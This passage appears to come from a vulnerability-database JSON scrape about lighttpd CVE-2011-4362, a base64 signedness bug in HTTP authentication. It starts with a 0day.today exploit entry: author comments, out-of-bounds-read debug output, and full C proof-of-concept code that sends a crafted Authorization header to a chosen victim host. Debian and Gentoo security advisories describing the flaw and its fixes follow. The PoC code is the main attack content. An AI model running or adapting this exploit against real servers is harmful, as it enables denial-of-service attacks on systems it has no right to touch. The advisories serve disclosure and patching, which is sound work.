\t\t...\r\n * \t\tch = base64_reverse_table[ch];\r\n * 
\t...\r\n * }\r\n * --- CUT ---\r\n *\r\n * Because variable 'in' is type 'char', characters above 0x80 lead to negative indices.\r\n * This vulnerability may lead out-of-boud read and theoretically cause Segmentation Fault\r\n * (Denial of Service attack). Unfortunately I couldn't find any binaries where .rodata\r\n * section before the base64_reverse_table table cause this situation.\r\n *\r\n * I have added some extra debug in the lighttpd source code to see if this vulnerability is\r\n * executed correctly. Here is output for one of the example:\r\n *\r\n * --- CUT ---\r\n * ptr[0x9a92c48] size[0xc0] used[0x0]\r\n * 127(. | 0 | 0)\r\n * -128(t | 1 | 0)\r\n * -127(e | 2 | 1)\r\n * -126(' | 3 | 2)\r\n * -125(e | 4 | 3)\r\n * -124(u | 5 | 3)\r\n * -123(r | 6 | 4)\r\n * -122(' | 7 | 5)\r\n * -121(s | 8 | 6)\r\n * -120(c | 9 | 6)\r\n * -119(i | 10 | 7)\r\n * -118(n | 11 | 8)\r\n * -117(i | 12 | 9)\r\n * -116( | 13 | 9)\r\n * -115(a | 14 | 10)\r\n * -114(t | 15 | 11)\r\n * -113(. | 16 | 12)\r\n * -112(e | 17 | 12)\r\n * -111(u | 18 | 13)\r\n * -110(r | 19 | 14)\r\n * -109(' | 20 | 15)\r\n * -108(f | 21 | 15)\r\n * -107(i | 22 | 16)\r\n * -106(e | 23 | 17)\r\n * -105(: | 24 | 18)\r\n * -104(= | 25 | 18)\r\n * -103(o | 26 | 19)\r\n * -102(t | 27 | 20)\r\n * -101(o | 28 | 21)\r\n * -100( | 29 | 21)\r\n * -99(a | 30 | 22)\r\n * -98(g | 31 | 23)\r\n * -97(. | 32 | 24)\r\n * -96(d | 33 | 24)\r\n * -95(g | 34 | 25)\r\n * -94(s | 35 | 26)\r\n * -93(: | 36 | 27)\r\n * -92(u | 37 | 27)\r\n * -91(s | 38 | 28)\r\n * -90(p | 39 | 29)\r\n * -89(o | 40 | 30)\r\n * -88(t | 41 | 30)\r\n * -87(d | 42 | 31)\r\n * -86(b | 43 | 32)\r\n * -85(c | 44 | 33)\r\n * -84(e | 45 | 33)\r\n * -83(d | 46 | 34)\r\n * -82(( | 47 | 35)\r\n * -81(n | 48 | 36)\r\n * -80(y | 49 | 36)\r\n * -79(h | 50 | 37)\r\n * -78(d | 51 | 38)\r\n * -77(g | 52 | 39)\r\n * -76(s | 53 | 39)\r\n * -75( | 54 | 40)\r\n * -74(r | 55 | 41)\r\n * -73(p | 56 | 42)\r\n * -72(a | 57 | 42)\r\n * -71(n | 58 | 43)\r\n * -70(. 
| 59 | 44)\r\n * -69(. | 60 | 45)\r\n * -68(d | 61 | 45)\r\n * -67(g | 62 | 46)\r\n * -66(s | 63 | 47)\r\n * -65(: | 64 | 48)\r\n * -64(( | 65 | 48)\r\n * -63(d | 66 | 49)\r\n * -62(- | 67 | 50)\r\n * -61(e | 68 | 51)\r\n * -60(s | 69 | 51)\r\n * -59( | 70 | 52)\r\n * -58(i | 71 | 53)\r\n * -57(s | 72 | 54)\r\n * -56(n | 73 | 54)\r\n * -55( | 74 | 55)\r\n * -54(i | 75 | 56)\r\n * -53(l | 76 | 57)\r\n * -52(. | 77 | 57)\r\n * -51(. | 78 | 58)\r\n * -50(k | 79 | 59)\r\n * -49(0 | 80 | 60)\r\n * -48(% | 81 | 60)\r\n * -47(] | 82 | 61)\r\n * -46(p | 83 | 62)\r\n * -45(r | 84 | 63)\r\n * -44(0 | 85 | 63)\r\n * -43(% | 86 | 64)\r\n * -42(] | 87 | 65)\r\n * -41(s | 88 | 66)\r\n * -40(z | 89 | 66)\r\n * -39([ | 90 | 67)\r\n * -38(x | 91 | 68)\r\n * -37(x | 92 | 69)\r\n * -36( | 93 | 69)\r\n * -35(s | 94 | 70)\r\n * -34(d | 95 | 71)\r\n * -33(0 | 96 | 72)\r\n * -32(% | 97 | 72)\r\n * -31(] | 98 | 73)\r\n * -30(. | 99 | 74)\r\n * -29(. | 100 | 75)\r\n * -28(d | 101 | 75)\r\n * -27(c | 102 | 76)\r\n * -26(d | 103 | 77)\r\n * -25(i | 104 | 78)\r\n * -24(g | 105 | 78)\r\n * -23(b | 106 | 79)\r\n * -22(s | 107 | 80)\r\n * -21(6 | 108 | 81)\r\n * -20(- | 109 | 81)\r\n * -19(t | 110 | 82)\r\n * -18(i | 111 | 83)\r\n * -17(g | 112 | 84)\r\n * -16(f | 113 | 84)\r\n * -15(i | 114 | 85)\r\n * -14(e | 115 | 86)\r\n * -13(. | 116 | 87)\r\n * -12(. | 117 | 87)\r\n * -11(. | 118 | 88)\r\n * -10(. | 119 | 89)\r\n * -9(. | 120 | 90)\r\n * -8(. | 121 | 90)\r\n * -7(. | 122 | 91)\r\n * -6(. | 123 | 92)\r\n * -5(. | 124 | 93)\r\n * -4(. | 125 | 93)\r\n * -3(. | 126 | 94)\r\n * -2(. | 127 | 95)\r\n * -1(. | 128 | 96)\r\n * k[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]\r\n * ptr[0x9a92c48] size[0xc0] used[0x60]\r\n * string [.Yg.\\...n.Xt.]r.ze.....g.Y..\\..Yb.Y(..d..r.[..Y...-.xi..i.]\r\n * --- CUT ---\r\n *\r\n * First column is the offset so vulnerability is executed like it should be\r\n * (negative offsets). 
Second column is byte which is read out-of-bound.\r\n *\r\n *\r\n * Maybe you can find vulnerable binary?\r\n *\r\n *\r\n * Best regards,\r\n * Adam 'pi3' Zabrocki\r\n *\r\n *\r\n * --\r\n * http://pi3.com.pl\r\n * http://site.pi3.com.pl/exp/p_cve-2011-4362.c\r\n * http://blog.pi3.com.pl/?p=277\r\n *\r\n */\r\n\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <netdb.h>\r\n#include <netinet/in.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <getopt.h>\r\n\r\n#define PORT 80\r\n#define SA struct sockaddr\r\n\r\nchar header[] =\r\n\"GET /%s/ HTTP/1.1\\r\\n\"\r\n\"Host: %s\\r\\n\"\r\n\"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\\r\\n\"\r\n\"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\"\r\n\"Accept-Language: pl,en-us;q=0.7,en;q=0.3\\r\\n\"\r\n\"Accept-Encoding: gzip, deflate\\r\\n\"\r\n\"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r\\n\"\r\n\"Proxy-Connection: keep-alive\\r\\n\"\r\n\"Authorization: Basic \";\r\n\r\nchar header_port[] =\r\n\"GET /%s/ HTTP/1.1\\r\\n\"\r\n\"Host: %s:%d\\r\\n\"\r\n\"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\\r\\n\"\r\n\"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\"\r\n\"Accept-Language: pl,en-us;q=0.7,en;q=0.3\\r\\n\"\r\n\"Accept-Encoding: gzip, deflate\\r\\n\"\r\n\"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r\\n\"\r\n\"Proxy-Connection: keep-alive\\r\\n\"\r\n\"Authorization: Basic \";\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n\r\n int i=PORT,opt=0,sockfd;\r\n char *remote_dir = NULL;\r\n char *r_hostname = NULL;\r\n struct sockaddr_in servaddr;\r\n struct hostent *h = NULL;\r\n char *buf;\r\n unsigned int len = 0x0;\r\n\r\n\r\n if (!argv[1])\r\n usage(argv[0]);\r\n\r\n\r\n printf(\"\\n\\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\\n\");\r\n printf(\"\\n\\t\\t[+] Preparing arguments... 
\");\r\n while((opt = getopt(argc,argv,\"h:d:p:?\")) != -1) {\r\n switch(opt) {\r\n\r\n case 'h':\r\n\r\n r_hostname = strdup(optarg);\r\n if ( (h = gethostbyname(r_hostname))==NULL) {\r\n printf(\"Gethostbyname() field!\\n\");\r\n exit(-1);\r\n }\r\n break;\r\n\r\n case 'p':\r\n\r\n i=atoi(optarg);\r\n break;\r\n\r\n case 'd':\r\n\r\n remote_dir = strdup(optarg);\r\n break;\r\n\r\n case '?':\r\n\r\n usage(argv[0]);\r\n break;\r\n\r\n default:\r\n\r\n usage(argv[0]);\r\n break;\r\n\r\n }\r\n }\r\n\r\n if (!remote_dir || !h) {\r\n usage(argv[0]);\r\n exit(-1);\r\n }\r\n\r\n servaddr.sin_family = AF_INET;\r\n servaddr.sin_port = htons(i);\r\n servaddr.sin_addr = *(struct in_addr*)h->h_addr;\r\n\r\n len = strlen(header_port)+strlen(remote_dir)+strlen(r_hostname)+512;\r\n if ( (buf = (char *)malloc(len)) == NULL) {\r\n printf(\"malloc() :(\\n\");\r\n exit(-1);\r\n }\r\n memset(buf,0x0,len);\r\n\r\n if (i != 80)\r\n snprintf(buf,len,header_port,remote_dir,r_hostname,i);\r\n else\r\n snprintf(buf,len,header,remote_dir,r_hostname);\r\n\r\n for (i=0;i<130;i++)\r\n buf[strlen(buf)] = 127+i;\r\n\r\n buf[strlen(buf)] = '\\r';\r\n buf[strlen(buf)] = '\\n';\r\n buf[strlen(buf)] = '\\r';\r\n buf[strlen(buf)] = '\\n';\r\n\r\n printf(\"OK\\n\\t\\t[+] Creating socket... \");\r\n if ( (sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0 ) {\r\n printf(\"Socket() error!\\n\");\r\n exit(-1);\r\n }\r\n\r\n printf(\"OK\\n\\t\\t[+] Connecting to [%s]... \",r_hostname);\r\n if ( (connect(sockfd,(SA*)&servaddr,sizeof(servaddr)) ) < 0 ) {\r\n printf(\"Connect() error!\\n\");\r\n exit(-1);\r\n }\r\n\r\n printf(\"OK\\n\\t\\t[+] Sending dirty packet... 
\");\r\n// write(1,buf,strlen(buf));\r\n write(sockfd,buf,strlen(buf));\r\n\r\n printf(\"OK\\n\\n\\t\\t[+] Check the website!\\n\\n\");\r\n\r\n close(sockfd);\r\n\r\n}\r\n\r\nint usage(char *arg) {\r\n\r\n printf(\"\\n\\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\\n\");\r\n printf(\"\\n\\tUsage: %s <options>\\n\\n\\t\\tOptions:\\n\",arg);\r\n printf(\"\\t\\t\\t -v <victim>\\n\\t\\t\\t -p <port>\\n\\t\\t\\t -d <remote_dir_for_auth>\\n\\n\");\r\n exit(0);\r\n}\r\n\r\n\r\n\n\n# 0day.today [2018-01-03] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/17319"}], "debian": [{"lastseen": "2020-11-11T13:22:12", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3389", "CVE-2011-4362"], "description": "- ---------------------------------------------------------------------------\nDebian Security Advisory DSA-2368-1 security@debian.org\nhttp://www.debian.org/security/ Nico Golde\nDec 20th, 2011 http://www.debian.org/security/faq\n- ---------------------------------------------------------------------------\n\nPackage : lighttpd\nVulnerability : multiple\nProblem type : remote\nDebian-specific: no\nDebian bug : 652726\nCVE IDs : CVE-2011-4362 CVE-2011-3389\n\nSeveral vulnerabilities have been discovered in lighttpd, a small and fast\nwebserver with minimal memory footprint.\n\nCVE-2011-4362\n\n Xi Wang discovered that the base64 decoding routine which is used to\n decode user input during HTTP authentication suffers from a signedness\n issue when processing user input (a byte with the high bit set becomes a\n negative table index). As a result it is possible to force\n lighttpd to perform an out-of-bounds read which results in Denial of\n Service conditions.\n\nCVE-2011-3389\n\n When using CBC ciphers on an SSL enabled virtual host to communicate with\n certain clients, a so-called "BEAST" attack allows man-in-the-middle\n attackers to obtain plaintext HTTP traffic via a blockwise\n chosen-boundary attack (BCBA) on an HTTPS session. 
Technically this is\n no lighttpd vulnerability. However, lighttpd offers a workaround to\n mitigate this problem by providing a possibility to disable CBC ciphers.\n\n This update enables this option by default. System administrators\n are advised to read the NEWS file of this update (as this may break older\n clients).\n\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.4.19+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.4.28-2+squeeze1.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.4.30-1.\n\n\nWe recommend that you upgrade your lighttpd packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n\n", "edition": 3, "modified": "2011-12-21T00:21:08", "published": "2011-12-21T00:21:08", "id": "DEBIAN:DSA-2381-:320B8", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00246.html", "title": "[SECURITY] [DSA 2381-] lighttpd security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-11-11T13:12:46", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3389", "CVE-2011-4362"], "description": "- ---------------------------------------------------------------------------\nDebian Security Advisory DSA-2368-1 security@debian.org\nhttp://www.debian.org/security/ Nico Golde\nDec 20th, 2011 http://www.debian.org/security/faq\n- ---------------------------------------------------------------------------\n\nPackage : lighttpd\nVulnerability : multiple\nProblem type : remote\nDebian-specific: no\nDebian bug : 652726\nCVE IDs : CVE-2011-4362 CVE-2011-3389\n\nSeveral vulnerabilities have been discovered in 
lighttpd, a small and fast\nwebserver with minimal memory footprint.\n\nCVE-2011-4362\n\n Xi Wang discovered that the base64 decoding routine which is used to\n decode user input during HTTP authentication suffers from a signedness\n issue when processing user input (a byte with the high bit set becomes a\n negative table index). As a result it is possible to force\n lighttpd to perform an out-of-bounds read which results in Denial of\n Service conditions.\n\nCVE-2011-3389\n\n When using CBC ciphers on an SSL enabled virtual host to communicate with\n certain clients, a so-called "BEAST" attack allows man-in-the-middle\n attackers to obtain plaintext HTTP traffic via a blockwise\n chosen-boundary attack (BCBA) on an HTTPS session. Technically this is\n no lighttpd vulnerability. However, lighttpd offers a workaround to\n mitigate this problem by providing a possibility to disable CBC ciphers.\n\n This update enables this option by default. System administrators\n are advised to read the NEWS file of this update (as this may break older\n clients).\n\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.4.19+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.4.28-2+squeeze1.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.4.30-1.\n\n\nWe recommend that you upgrade your lighttpd packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n\n", "edition": 7, "modified": "2011-12-21T00:42:08", "published": "2011-12-21T00:42:08", "id": "DEBIAN:DSA-2368-1:91542", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00247.html", "title": "[SECURITY] [DSA 2368-1] lighttpd security update", "type": "debian", "cvss": {"score": 5.0, 
"vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:42", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4508", "CVE-2014-2323", "CVE-2012-5533", "CVE-2013-4560", "CVE-2013-4559", "CVE-2011-4362"], "edition": 1, "description": "### Background\n\nlighttpd is a lightweight high-performance web server.\n\n### Description\n\nMultiple vulnerabilities have been discovered in lighttpd. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could create a Denial of Service condition. Furthermore, a remote attacker may be able to execute arbitrary SQL statements. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll lighttpd users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-servers/lighttpd-1.4.35\"", "modified": "2014-06-13T00:00:00", "published": "2014-06-13T00:00:00", "id": "GLSA-201406-10", "href": "https://security.gentoo.org/glsa/201406-10", "type": "gentoo", "title": "lighttpd: Multiple vulnerabilities", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}